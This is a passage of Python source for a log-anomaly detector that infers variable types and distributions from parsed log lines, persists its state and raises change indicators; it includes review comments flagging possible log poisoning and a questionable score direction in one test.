uniform distribution self.min_mod_ini_uni = 1 / (self.num_init + 1) self.min_mod_upd_uni = 1 / (self.num_init + self.num_update + 1) self.max_mod_ini_uni = 1 / (self.num_init + 1) self.max_mod_upd_uni = 1 / (self.num_init + self.num_update + 1) # Generate the modifiers for the estimation of the minimum and maximum for the beta1 distribution self.min_mod_ini_beta1 = self.quantiles['beta1'][max(0.001, int(1 / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.min_mod_upd_beta1 = self.quantiles['beta1'][max(0.001, int(1 / (self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] self.max_mod_ini_beta1 = 1 - self.quantiles['beta1'][min(0.999, int(self.num_init / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.max_mod_upd_beta1 = 1 - self.quantiles['beta1'][min(0.999, int((self.num_init + self.num_update) / ( self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] # Generate the modifiers for the estimation of the minimum and maximum for the beta2 distribution self.min_mod_ini_beta2 = self.quantiles['beta2'][max(0.001, int(1 / (self.num_init + 1) * 1000 + 
0.5) / 1000)]
        self.min_mod_upd_beta2 = self.quantiles['beta2'][max(0.001, int(1 / (self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)]
        self.max_mod_ini_beta2 = 1-self.quantiles['beta2'][min(0.999, int(self.num_init / (self.num_init + 1) * 1000 + 0.5) / 1000)]
        self.max_mod_upd_beta2 = 1-self.quantiles['beta2'][min(0.999, int((self.num_init + self.num_update) / (
            self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)]
        # Generate the modifiers for the estimation of the minimum and maximum for the beta4 distribution
        self.min_mod_ini_beta4 = self.quantiles['beta4'][max(0.001, int(1 / (self.num_init + 1) * 1000 + 0.5) / 1000)]
        self.min_mod_upd_beta4 = self.quantiles['beta4'][max(0.001, int(1 / (self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)]
        self.max_mod_ini_beta4 = 1-self.quantiles['beta4'][min(0.999, int(self.num_init / (self.num_init + 1) * 1000 + 0.5) / 1000)]
        self.max_mod_upd_beta4 = 1-self.quantiles['beta4'][min(0.999, int((self.num_init + self.num_update) / (
            self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)]

    def receive_atom(self, log_atom):
        """
        Receive a parsed atom and hand it to the variable type detection.
        Event types the detector has not tracked yet (or whose entry was reset to []) get their bookkeeping lists
        created here before the line is passed to process_ll.
        @param log_atom the parsed log atom; its parser_match and atom_time are read.
        @return True if the atom was processed, False if it was skipped (no current event type, an ignored path
        matched, or none of the configured constraint paths matched).
        """
        event_index = self.event_type_detector.current_index
        if event_index == -1:
            return False

        # Learning is switched off once the configured stop timestamp has passed.
        if self.learn_mode is True and self.stop_learning_timestamp is not None and \
                self.stop_learning_timestamp < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False

        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()

        # Atoms containing any path from ignore_list are not analysed.
        if any(ignore_path in match_dict for ignore_path in self.ignore_list):
            return False

        # Without a target_path_list, at least one constraint path has to be present (when constraints are configured).
        if not self.target_path_list:
            has_constraint_path = any(match_dict.get(constraint_path) is not None for constraint_path in self.constraint_list)
            if self.constraint_list != [] and not has_constraint_path:
                return False

        # Set up the per-variable bookkeeping for an event type seen for the first time, or one whose entry was reset.
        if len(self.length) < event_index + 1 or self.var_type[event_index] == []:
            missing = event_index + 1 - len(self.length)
            for _ in range(missing):
                self.length.append(0)
                self.variable_path_num.append([])
                self.var_type.append([])
                self.alternative_distribution_types.append([])
                self.distr_val.append([])
                self.bt_results.append([])

            variable_keys = self.event_type_detector.variable_key_list[event_index]
            num_vars = len(variable_keys)
            self.length[event_index] = num_vars
            # One slot per variable: detected type, alternative distributions, distribution values for the s_gof,
            # and the binomial test results of the s_gof / discrete variables.
            self.var_type[event_index] = [[] for _ in range(num_vars)]
            self.alternative_distribution_types[event_index] = [[] for _ in range(num_vars)]
            self.distr_val[event_index] = [[] for _ in range(num_vars)]
            self.bt_results[event_index] = [[] for _ in range(num_vars)]

            # Only variables whose path is listed in target_path_list are tracked when that list is set.
            if self.target_path_list is not None:
                self.variable_path_num[event_index].extend(
                    var_index for var_index, key in enumerate(variable_keys) if key in self.target_path_list)

            self.num_events = max(self.num_events, event_index + 1)

        self.process_ll(event_index, log_atom)
        return True

    def do_timer(self, trigger_time):
        """
        Persist the detector state once the persistence period has elapsed.
        @param trigger_time the time the timer fired.
        @return the number of seconds until the next persistence is due.
        """
        period = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        if self.next_persist_time is None:
            return period
        remaining = self.next_persist_time - trigger_time
        if remaining > 0:
            return remaining
        self.do_persist()
        self.next_persist_time = time.time() + period
        return period

    def do_persist(self):
        """
        Write the detector state to the persistence file (and the statistics file when save_statistics is set).
        Only the distribution values of variables typed 'emp' are written; every other distr_val entry is stored as [].
        """
        def emp_values(event_index, var_index):
            # Distribution values are only kept for empirical distributions.
            values = self.distr_val[event_index][var_index]
            if len(values) > 0 and self.var_type[event_index][var_index][0] == 'emp':
                return values
            return []

        persisted_distr_val = [[emp_values(event_index, var_index) for var_index in range(len(self.distr_val[event_index]))]
                               for event_index in range(len(self.distr_val))]
        state = [self.var_type, self.alternative_distribution_types, self.var_type_history_list,
                 self.var_type_history_list_reference, self.failed_indicators, persisted_distr_val]
        PersistenceUtil.store_json(self.persistence_file_name, state)
        if self.save_statistics:
            statistics = [self.failed_indicators_total, self.failed_indicators_values, self.failed_indicators_paths,
                          self.failed_indicators]
            PersistenceUtil.store_json(self.statistics_file_name, statistics)
        logging.getLogger(DEBUG_LOG_NAME).debug('%s persisted data.', self.__class__.__name__)

    def load_persistence_data(self, persistence_data):
        """
        Restore the detector state from persisted data and rebuild the lists that are not persisted.
        @param persistence_data the list written by do_persist: var_type, alternative_distribution_types,
        var_type_history_list, var_type_history_list_reference, failed_indicators and distr_val, in that order.
        """
        self.var_type = persistence_data[0]
        self.alternative_distribution_types = persistence_data[1]
        self.var_type_history_list = persistence_data[2]
        self.var_type_history_list_reference = persistence_data[3]
        self.failed_indicators = persistence_data[4]
        self.distr_val = persistence_data[5]
        self.num_events = len(self.var_type)

        # Derived lists: variable counts, tracked variable indices and binomial test results per event type.
        self.length = [len(self.event_type_detector.variable_key_list[event_index]) for event_index in range(self.num_events)]
        self.variable_path_num = [[] for _ in range(self.num_events)]
        self.bt_results = [[[] for _ in range(num_vars)] for num_vars in self.length]

        for event_index in range(self.num_events):
            variable_keys = self.event_type_detector.variable_key_list[event_index]
            # Only variables whose path is listed in target_path_list are tracked when that list is set.
            if self.target_path_list is not None:
                self.variable_path_num[event_index].extend(
                    var_index for var_index, key in enumerate(variable_keys) if key in self.target_path_list)

            # Re-initialise the test state that depends on the persisted variable type.
            for var_index, var_val in enumerate(self.var_type[event_index]):
                if len(var_val) == 0:
                    continue
                type_name = var_val[0]
                if type_name in self.distr_list:
                    self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt
                    if type_name in ('betam', 'spec'):
                        self.s_gof_get_quantiles(event_index, var_index)
                elif type_name == 'd':
                    self.d_init_bt(event_index, var_index)

    def process_ll(self, event_index, log_atom):
        """Process the log line.
Extracts and appends the values of the log line to the values-list.""" # Return if no variable is tracked in the VTD if len(self.event_type_detector.variable_key_list[event_index]) == 0 or ( self.target_path_list is not None and self.variable_path_num[event_index] == []): return # Initial detection of variable types if self.event_type_detector.num_event_lines[event_index] >= self.num_init and \ self.event_type_detector.check_variables[event_index][0] and self.var_type[event_index][0] == []: # Test all variables logging.getLogger(DEBUG_LOG_NAME).debug('%s started initial detection of var types.', self.__class__.__name__) if self.target_path_list is None: for var_index in range(self.length[event_index]): tmp_var_type = self.detect_var_type(event_index, var_index) # VarType is empiric distribution if tmp_var_type[0] == 'emp': self.var_type[event_index][var_index] = tmp_var_type self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.s_gof_get_quantiles(event_index, var_index) # VarType is a continuous distribution elif tmp_var_type[0] in self.distr_list: self.var_type[event_index][var_index] = tmp_var_type[:-1] self.alternative_distribution_types[event_index][var_index] = tmp_var_type[-1] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) # Initializes the binomialtest for the discrete type elif tmp_var_type[0] == 'd': self.var_type[event_index][var_index] = tmp_var_type self.d_init_bt(event_index, var_index) # Mark the variables, which could be static parts of the parser model elif tmp_var_type[0] == 'stat': self.var_type[event_index][var_index] = tmp_var_type self.var_type[event_index][var_index][2] = True else: self.var_type[event_index][var_index] = tmp_var_type # Test only the variables with paths in the target_path_list else: for var_index in self.variable_path_num[event_index]: tmp_var_type = 
self.detect_var_type(event_index, var_index) # VarType is empiric distribution if tmp_var_type[0] == 'emp': self.var_type[event_index][var_index] = tmp_var_type self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.s_gof_get_quantiles(event_index, var_index) # VarType is a continuous distribution elif tmp_var_type[0] in self.distr_list: self.var_type[event_index][var_index] = tmp_var_type[:-1] self.alternative_distribution_types[event_index][var_index] = tmp_var_type[-1] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) # VarType is range elif tmp_var_type[0] == 'range': self.var_type[event_index][var_index] = tmp_var_type # Initializes the binomialtest for the discrete type elif tmp_var_type[0] == 'd': self.var_type[event_index][var_index] = tmp_var_type self.d_init_bt(event_index, var_index) # mMrk the variables, which could be static parts of the parser model elif tmp_var_type[0] == 'stat': self.var_type[event_index][var_index] = tmp_var_type self.var_type[event_index][var_index][2] = True else: self.var_type[event_index][var_index] = tmp_var_type self.init_var_type_history_list(event_index) self.print_initial_var_type(event_index, log_atom) self.log_new_learned += len(self.var_type[event_index]) self.log_new_learned_values.append(self.var_type[event_index]) # Update variable types elif self.event_type_detector.num_event_lines[event_index] > self.num_init and ( self.event_type_detector.num_event_lines[event_index] - self.num_init) % self.num_update == 0: logging.getLogger(DEBUG_LOG_NAME).debug('%s started update phase of var types.', self.__class__.__name__) # Check if the updates of the variable types should be stopped if self.learn_mode and (not isinstance(self.num_stop_update, bool)) and ( self.event_type_detector.total_records >= self.num_stop_update): self.learn_mode = False # Get the index_list for the 
variables which should be updated index_list = None if self.target_path_list is None: index_list = range(self.length[event_index]) else: index_list = self.variable_path_num[event_index] self.log_updated += len(index_list) # Update the variable types and history list for var_index in index_list: # Skips the variable if check_variable is False if not self.event_type_detector.check_variables[event_index][var_index]: continue # Update variable types self.update_var_type(event_index, var_index, log_atom) # This section updates the history list of the variable types if self.var_type[event_index][var_index][0] in self.var_type_history_list_order: # Index of the variable type in the list # [others, static, [discrete, number of appended steps], # asc, desc, unique, range, ev of continuous distributions] type_index = self.var_type_history_list_order.index(self.var_type[event_index][var_index][0]) else: type_index = self.var_type_history_list_order.index('cont') for tmp_type_index, tmp_type_val in enumerate(self.var_type_history_list[event_index][var_index]): if tmp_type_index == type_index: if self.var_type_history_list_order[type_index] == 'cont': for _, val in enumerate(tmp_type_val): val.append(0) # Continuously distributed variable type. 
if self.var_type[event_index][var_index][0] == 'uni': tmp_type_val[0][-1] = ( self.var_type[event_index][var_index][1] + self.var_type[event_index][var_index][2]) / 2 tmp_type_val[1][-1] = ( self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) / np.sqrt(12) else: tmp_type_val[0][-1] = self.var_type[event_index][var_index][1] tmp_type_val[1][-1] = self.var_type[event_index][var_index][2] elif self.var_type_history_list_order[type_index] == 'range': tmp_type_val[0].append(self.var_type[event_index][var_index][1]) tmp_type_val[1].append(self.var_type[event_index][var_index][2]) elif len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list): tmp_type_val[0].append(1) for i in range(1, len(tmp_type_val)): # skipcq: PTC-W0060 tmp_type_val[i].append(0) else: tmp_type_val.append(1) else: if len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list): for _, val in enumerate(tmp_type_val): val.append(0) else: tmp_type_val.append(0) # Reduce the number of variables, which are tracked if (self.num_updates_until_var_reduction > 0 and ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update == self.num_updates_until_var_reduction - 1): for var_index, var_val in enumerate(self.var_type_history_list[event_index]): # Skips the variable if it is already not being checked if not self.event_type_detector.check_variables[event_index][var_index]: continue tmp_max = 1 exceeded_thresh = False for type_index in range(1, len(var_val)): # skipcq: PTC-W0060 # Continuous Distribution if type_index in [self.var_type_history_list_order.index('cont'), self.var_type_history_list_order.index('range')]: num_app = len([1 for x in var_val[type_index][1] if x != 0]) if num_app / self.num_updates_until_var_reduction >= self.var_reduction_thres: exceeded_thresh = True break if num_app > tmp_max: tmp_max = num_app # Distributions which are neither continuous nor range else: if len(var_val[type_index]) >= 1 and 
isinstance(var_val[type_index][0], list): num_app = sum(var_val[type_index][0]) if num_app / self.num_updates_until_var_reduction >= self.var_reduction_thres: exceeded_thresh = True break if num_app > tmp_max: tmp_max = num_app else: num_app = sum(var_val[type_index]) if num_app / self.num_updates_until_var_reduction >= self.var_reduction_thres: exceeded_thresh = True break if num_app > tmp_max: tmp_max = num_app # Remove the variable if it did not exceed the threshold if not exceeded_thresh: self.event_type_detector.check_variables[event_index][var_index] = False self.event_type_detector.values[event_index][var_index] = [] self.var_type[event_index][var_index] = [] self.var_type_history_list[event_index][var_index] = [] self.distr_val[event_index][var_index] = [] if len(self.var_type_history_list_reference) > event_index and len( self.var_type_history_list_reference[event_index]) > var_index: self.var_type_history_list_reference[event_index][var_index] = [] affected_path = self.event_type_detector.variable_key_list[event_index][var_index] self.print( f'Stopped tracking the variable of event type {self.event_type_detector.get_event_type(event_index)} with ' f'Path:\n{affected_path}\nbecause of irregular variable types.', log_atom, affected_path, confidence=1 / (1 + np.exp(-4 / tmp_max)) / 0.9820137900379085) # 1 / (1 + np.exp(-4 / tmp_max)) / 0.9820137900379085 is the scaled sigmoidfunction. 
# 1 / (1 + np.exp(-4)) = 0.9820137900379085 # Saves the initial reference state of the var_type_history_list for the calculation of the indicator if ((self.num_updates_until_var_reduction == 0) or ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_updates_until_var_reduction - 1) and (not isinstance(self.num_var_type_hist_ref, bool)) and ( (len(self.var_type_history_list_reference) < event_index + 1) or self.var_type_history_list_reference[event_index] == []) and ( (self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_var_type_hist_ref - 1): if len(self.var_type_history_list_reference) < event_index + 1: for i in range(event_index + 1 - len(self.var_type_history_list_reference)): self.var_type_history_list_reference.append([]) for var_index, var_val in enumerate(self.var_type_history_list[event_index]): self.var_type_history_list_reference[event_index].append([]) for type_index, type_val in enumerate(var_val): if len(type_val) >= 1 and isinstance(type_val[0], list): # Continuous variable type if type_index in [self.var_type_history_list_order.index('cont'), self.var_type_history_list_order.index('range')]: # Calculate the mean of all entries not zero self.var_type_history_list_reference[event_index][var_index].append([sum( type_val[0][-self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[0][ -self.num_var_type_hist_ref:] if x != 0]), 1), sum(type_val[1][-self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[1][-self.num_var_type_hist_ref:] if x != 0]), 1)]) else: self.var_type_history_list_reference[event_index][var_index].append([sum(x[ -self.num_var_type_hist_ref:]) for x in type_val]) else: self.var_type_history_list_reference[event_index][var_index].append(sum(type_val[-self.num_var_type_hist_ref:])) # Check the indicator for the variable types of the Event and generates an output, if it fails else: if ((self.num_updates_until_var_reduction == 0) 
or ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_updates_until_var_reduction - 1) and (not isinstance( self.num_var_type_considered_ind, bool)) and (not isinstance(self.num_var_type_hist_ref, bool)) and len( self.var_type_history_list_reference) > event_index and (self.var_type_history_list_reference[event_index] != []) and ( ((self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update - self.num_var_type_hist_ref) % self.num_var_type_considered_ind) == 0: # Shorten the var_type_history_list if len(self.var_type_history_list[event_index]) > 0 and len(self.var_type_history_list[event_index][0]) > 0 and len( self.var_type_history_list[event_index][0][0]) > max( self.num_var_type_considered_ind, self.num_var_type_hist_ref): for var_index, var_val in enumerate(self.var_type_history_list[event_index]): for type_index, type_val in enumerate(var_val): # Differentiation between the entries, which are lists (e.g. 
discrete) and values if isinstance(type_val[0], list): for i, val in enumerate(type_val): if isinstance(val, list): type_val[i] = val[-max(self.num_var_type_considered_ind, self.num_var_type_hist_ref):] else: var_val[type_index] = type_val[-max(self.num_var_type_considered_ind, self.num_var_type_hist_ref):] indicator_list = self.get_indicator(event_index) indicator = max(0, max(indicator_list)) if indicator >= self.indicator_thres: # Update the list of the failed indicators, which is used for the weights of the indicator if len(self.failed_indicators) < event_index + 1: # Extend the lists if necessary tmp_len = len(self.failed_indicators) for i in range(event_index + 1 - tmp_len): self.failed_indicators.append([[] for _ in range(len(self.var_type[tmp_len + i]))]) # Indices of the variables, which would have failed the indicator indices_failed_tests = [] for var_index in range(len(self.var_type[event_index])): # skipcq: PTC-W0060 if indicator_list[var_index] >= self.indicator_thres: indices_failed_tests.append(var_index) self.failed_indicators[event_index][var_index].append(self.event_type_detector.num_event_lines[event_index]) # Multiply the single values of the indicator with their corresponding weights # Number of the log line which corresponds to the first indicator, which is taken into account first_line_num = self.event_type_detector.num_event_lines[event_index] - self.num_update * \ self.num_var_type_considered_ind * (self.num_ind_for_weights + self.num_skipped_ind_for_weights) # Number of the log line which corresponds to the last indicator, which is taken into account last_line_num = self.event_type_detector.num_event_lines[event_index] - self.num_update * \ self.num_var_type_considered_ind * self.num_skipped_ind_for_weights for var_index in indices_failed_tests: lower_ind = False # Index of the lower limit of the considered values of the failed_indicator list upper_ind = False # Index of the upper limit of the considered values of the failed_indicator list 
for i, val in enumerate(self.failed_indicators[event_index][var_index]): if val >= first_line_num: lower_ind = i break if isinstance(lower_ind, bool): lower_ind = 0 upper_ind = 0 else: for i, val in enumerate(self.failed_indicators[event_index][var_index], start=lower_ind): if val >= last_line_num: upper_ind = i break if isinstance(upper_ind, bool): upper_ind = len(self.failed_indicators[event_index][var_index]) # Calculating the weight for the indicator indicator_weight = 1 / (1 + upper_ind - lower_ind) indicator_list[var_index] = indicator_list[var_index] * indicator_weight # Reduce the list of the failed indicators self.failed_indicators[event_index][var_index] = self.failed_indicators[event_index][var_index][lower_ind:] # Calculate and print the confidence of the failed indicator indicator = sum(indicator_list[var_index] for var_index in indices_failed_tests) if self.save_statistics: if log_atom.atom_time is not None: self.failed_indicators_total.append(log_atom.atom_time) else: self.failed_indicators_total.append(time.time()) self.failed_indicators_values.append(np.arctan(2 * indicator) / np.pi * 2) if self.event_type_detector.id_path_list != []: self.failed_indicators_paths.append(self.event_type_detector.id_path_list_tuples[event_index]) else: self.failed_indicators_paths.append(self.event_type_detector.longest_path[event_index]) tmp_string = '' affected_paths = [self.event_type_detector.variable_key_list[event_index][var_index] for var_index in indices_failed_tests] if self.var_type_history_list: tmp_string += f'Event {self.event_type_detector.get_event_type(event_index)}: ' tmp_string += f'Indicator of a change in system behaviour: {np.arctan(2 * indicator) / np.pi * 2}. 
Paths to' \ f' the corresponding variables: {affected_paths}' self.print(tmp_string, log_atom, affected_paths, np.arctan(2 * indicator) / np.pi * 2, indicator=True) # Update the var_type_history_list_reference if self.learn_mode and (not isinstance(self.num_var_type_hist_ref, bool)) and ( not isinstance(self.num_update_var_type_hist_ref, bool)) and len( self.var_type_history_list_reference) >= event_index + 1 and \ self.var_type_history_list_reference[event_index] != [] and ((( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update - self.num_var_type_hist_ref) % self.num_update_var_type_hist_ref == 0): for var_index, var_val in enumerate(self.var_type_history_list[event_index]): self.var_type_history_list_reference[event_index][var_index] = [] for type_index, type_val in enumerate(var_val): if len(type_val) >= 1 and isinstance(type_val[0], list): if type_index in [self.var_type_history_list_order.index('cont'), self.var_type_history_list_order.index('range')]: # Continuous or range variable type # Calculate the mean of all entries not zero self.var_type_history_list_reference[event_index][var_index].append([sum( type_val[0][-self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[0][ -self.num_var_type_hist_ref:] if x != 0]), 1), sum(type_val[1][ -self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[1][ -self.num_var_type_hist_ref:] if x != 0]), 1)]) else: self.var_type_history_list_reference[event_index][var_index].append( [sum(x[-self.num_var_type_hist_ref:]) for x in type_val]) else: self.var_type_history_list_reference[event_index][var_index].append(sum( type_val[-self.num_var_type_hist_ref:])) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time def detect_var_type(self, event_index, var_index): """Give back the assumed variable type of the variable with the in self.event_type_detector stored 
values.""" # Values which are being tested values = self.event_type_detector.values[event_index][var_index][-self.num_init:] # Unique values values_set = set(values) # Number of unique values num_diff_vals = len(values_set) if num_diff_vals == 1: return ['stat', list(values_set), False] # List of floats or False float_values = convert_to_floats(values) is_int = False if len(float_values) > 0: is_int = consists_of_ints(float_values) # Values are integer numbers if len(float_values) > 0: previous_val = float_values[0] asc = True desc = True # Test for ascending for v in float_values[1:]: if previous_val > v: asc = False break previous_val = v previous_val = float_values[0] # Test for descending for v in float_values[1:]: if previous_val < v: desc = False break previous_val = v if asc: if is_int: return ['asc', 'int'] return ['asc', 'float'] if desc: if is_int: return ['desc', 'int'] return ['desc', 'float'] # Checking if no integers should be tested and if the values are integers if not self.test_gof_int and is_int: float_values = [] if len(float_values) > 0 and (num_diff_vals > self.div_thres * self.num_init): float_values_mean = np.mean(float_values) dw_result = durbin_watson([val - float_values_mean for val in float_values]) if dw_result < self.crit_val_dw[self.dw_alpha][len(float_values)] or\ dw_result > 4 - self.crit_val_dw[self.dw_alpha][len(float_values)]: var_type = self.calculate_value_range(float_values) else: # test for a continuous distribution. If none fits, the function will return ['d'] var_type = self.detect_continuous_shape(float_values) else: # discrete var type var_type = ['d'] # Test for discrete, unique and others if var_type == ['d']: if self.num_init == num_diff_vals and (len(float_values) == 0 or is_int): # unique var type return ['unq', values] if num_diff_vals >= self.num_init * (1 - self.sim_thres): # Values do not follow a specific pattern, the second entry is the number of update runs without a new type. 
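return ['others', 0]
            # Initialize the discrete type
            values_set = list(values_set)
            values_app = [0 for _ in range(num_diff_vals)]
            for value in values:
                values_app[values_set.index(value)] += 1
            values_app = [x / len(values) for x in values_app]
            # discrete var type
            return ['d', values_set, values_app, len(values)]
        return var_type

    def detect_continuous_shape(self, values):
        """
        Test whether the sample follows one of the checked continuous distributions.

        The goodness-of-fit test is selected by self.used_gof_test:
        'KS' (Kolmogorov-Smirnov): the fit score is the KS p-value, or
            gof_alpha * tabulated critical value / D when crit_val_ini_ks holds an
            entry for (gof_alpha, num_init); in both forms larger means a better fit.
        'CM' (Cramer-von-Mises): the fit score is the statistic divided by its
            tabulated critical value, so a score <= 1 passes and smaller is better.

        values: list of floats/ints with at least two distinct values (the sample is
            rescaled by max - min and by the fitted sigma, both of which must be > 0;
            detect_var_type guarantees this by returning 'stat' for a single value).
        Returns a list [tag, parameters..., alternatives] where tag is one of 'uni',
        'nor', 'beta', 'betam' or 'spec' and alternatives lists the other
        distributions that also passed, best fit first. When nothing fits the result
        is ['emp', ev, sigma, []] if self.use_empiric_distr is set, else ['d'] (the
        caller then treats the variable as discrete).
        NOTE(review): the shape is learned purely from the observed log values, so
        while learn_mode is on an attacker who controls the logged field can steer
        the model that later defines "normal" - confirm that the surrounding
        detector bounds this (e.g. through the stop_learning_* settings).
        """
        # Fit scores of the tested distributions, aligned index by index with `distribution`
        significance = []
        # Tested distributions, one entry per fit score
        distribution = []
        # Converts the floats/integer to an array for faster manipulations and tests
        values = np.array(values)
        min_val = min(values)
        max_val = max(values)
        span = max_val - min_val
        # Expected value and standard deviation of the normal fit; computed once up front so the
        # empiric fallback at the end is defined whichever test is configured.
        [ev, sigma] = norm.fit(values)

        if self.used_gof_test == 'KS':
            # Is a critical value tabulated for this (gof_alpha, num_init) combination?
            has_crit = self.gof_alpha in self.crit_val_ini_ks and self.num_init in self.crit_val_ini_ks[self.gof_alpha]

            def ks_score(sample, dist_name, crit_key, args=()):
                """Score one scipy distribution: gof_alpha * crit / D with a tabulated critical value, else the p-value."""
                result = kstest(sample, dist_name, args=args)
                if has_crit:
                    return self.gof_alpha * self.crit_val_ini_ks[self.gof_alpha][self.num_init][crit_key] / result[0]
                return result[1]

            # Test for uniform distribution on [min_val, max_val]
            significance.append(ks_score(values, 'uniform', 'uni', args=(min_val, span)))
            distribution.append(['uni', min_val, max_val])

            # Test for normal distribution on the standardised values
            significance.append(ks_score((values - ev) / sigma, 'norm', 'nor'))
            distribution.append(['nor', ev, sigma, min_val, max_val])

            # Test for beta(0.5, 0.5) on the sample rescaled to [0, 1]. Its mean/sd on [min_val, max_val]:
            # (0.5*0.5/((0.5+0.5+1)(0.5+0.5)^2))^(1/2) = 1/2.82842712 of the span
            ev_tmp = (min_val + max_val) / 2
            sigma_tmp = span / 2.82842712
            significance.append(ks_score((values - min_val) / span, 'beta', 'beta1', args=(0.5, 0.5)))
            distribution.append(['beta', ev_tmp, sigma_tmp, min_val, max_val, 1])

            # Beta shapes 2-5: the sample is standardised to the mean a/(a+b) and sd of beta(a, b).
            # The mirrored pairs (2/3 and 4/5) share one tabulated critical value.
            beta_shapes = ((2, (5, 2), 'beta2'), (3, (2, 5), 'beta2'), (4, (1, 5), 'beta4'), (5, (5, 1), 'beta4'))
            for beta_id, (a, b), crit_key in beta_shapes:
                standardised = (values - ev) / sigma * pow(a * b / (a + b + 1), 1 / 2) / (a + b) + a / (a + b)
                significance.append(ks_score(standardised, 'beta', crit_key, args=(a, b)))
                distribution.append(['beta', ev, sigma, min_val, max_val, beta_id])

            # Crit value for the self generated or mixed distributions
            crit_val = pow(-np.log(self.gof_alpha) * 3 / self.num_init / 4, 1 / 2)
            est_penalty = 1.4  # Estimated penalty for the adapted ev and SD

            def ks2_score(reference, sample):
                """Score a self-generated distribution (given by its 1000 quantiles) with a two-sample KS test."""
                result = ks_2samp(reference, sample)
                if has_crit:
                    # NOTE(review): this ratio grows with D (i.e. with a worse fit) while ks_score shrinks with D,
                    # yet both are compared against gof_alpha below - verify the intended direction.
                    return result[0] / crit_val * est_penalty
                return result[1]

            # Test for the mixed beta distribution, only when the sample mean lies strictly between the
            # means of beta 4 (1/6) and beta 5 (5/6) on [0, 1]
            if 1 / 6 < (ev - min_val) / span < 5 / 6:
                # Interpolate the expected distribution functions through the position of the mean in the interval
                proportion = ((ev - min_val) / span - 5 / 6) / (-4 / 6)
                from_first = [int(round(i / proportion)) for i in range(int(round(1000 * proportion)))]
                taken = set(from_first)
                reference = [self.quantiles['betam1'][i] for i in from_first] + [
                    self.quantiles['betam2'][i] for i in range(1000) if i not in taken]
                significance.append(ks2_score(reference, (values - min_val) / span))
                distribution.append(['betam', min_val, span, min_val, max_val, proportion])

            # Test for the alternative ('spec') distribution on the standardised values, as-is and mirrored
            standardised = (values - ev) / sigma
            significance.append(ks2_score(self.quantiles['spec'], standardised))
            distribution.append(['spec', ev, sigma, min_val, max_val, 0])
            significance.append(ks2_score(self.quantiles['spec'], -standardised))
            distribution.append(['spec', ev, sigma, min_val, max_val, 1])

            # Check if one of the above tested continuous distribution fits
            if max(significance) >= self.gof_alpha:
                ranked = np.argsort(significance)[::-1]  # best fit first
                alternatives = [distribution[i] for i in ranked[1:] if significance[i] >= self.gof_alpha]
                return distribution[ranked[0]] + [alternatives]

        if self.used_gof_test == 'CM':
            # NOTE(review): unlike the KS branch there is no p-value fallback here; a missing
            # (gof_alpha, num_init) entry in crit_val_ini_cm raises KeyError.
            crit = self.crit_val_ini_cm[self.gof_alpha][self.num_init]

            # Test for uniform distribution; the *_mod_ini_uni margins shrink the sample into the interior of [0, 1]
            uni_span = 1 - self.min_mod_ini_uni - self.max_mod_ini_uni
            significance.append(cramervonmises(
                (values - min_val) / span * uni_span + self.min_mod_ini_uni, 'uniform') / crit['uni'])
            distribution.append(['uni', min_val - self.min_mod_ini_uni / uni_span * span,
                                 max_val + self.max_mod_ini_uni / uni_span * span])

            # Test for normal distribution
            significance.append(cramervonmises((values - ev) / sigma, 'norm') / crit['nor'])
            distribution.append(['nor', ev, sigma, min_val, max_val])

            # Test for beta1 distribution
            beta1_span = 1 - self.min_mod_ini_beta1 - self.max_mod_ini_beta1
            significance.append(cramervonmises(
                (values - min_val) / span * beta1_span + self.min_mod_ini_beta1, 'beta', args=(0.5, 0.5)) / crit['beta1'])
            distribution.append(['beta', ev, sigma, min_val - self.min_mod_ini_beta1 / beta1_span * span,
                                 max_val + self.max_mod_ini_beta1 / beta1_span * span, 1])

            # Test for beta2 distribution
            significance.append(cramervonmises(
                (values - min_val) / span * (1 - self.max_mod_ini_beta2 - self.min_mod_ini_beta2) + self.min_mod_ini_beta2,
                'beta', args=(5, 2)) / crit['beta2'])
            distribution.append(['beta', ev, sigma,
                                 min_val - self.min_mod_ini_beta2 / (1 - self.min_mod_ini_beta2 - self.max_mod_ini_beta2) * span,
                                 max_val + self.max_mod_ini_beta2 / (1 - self.min_mod_ini_beta2 - self.max_mod_ini_beta2) * span, 2])

            # Test for beta3 distribution (the mirror image of beta2, hence the swapped margins)
            significance.append(cramervonmises(
                (values - min_val) / span * (1 - self.max_mod_ini_beta2 - self.min_mod_ini_beta2) + self.max_mod_ini_beta2,
                'beta', args=(2, 5)) / crit['beta2'])
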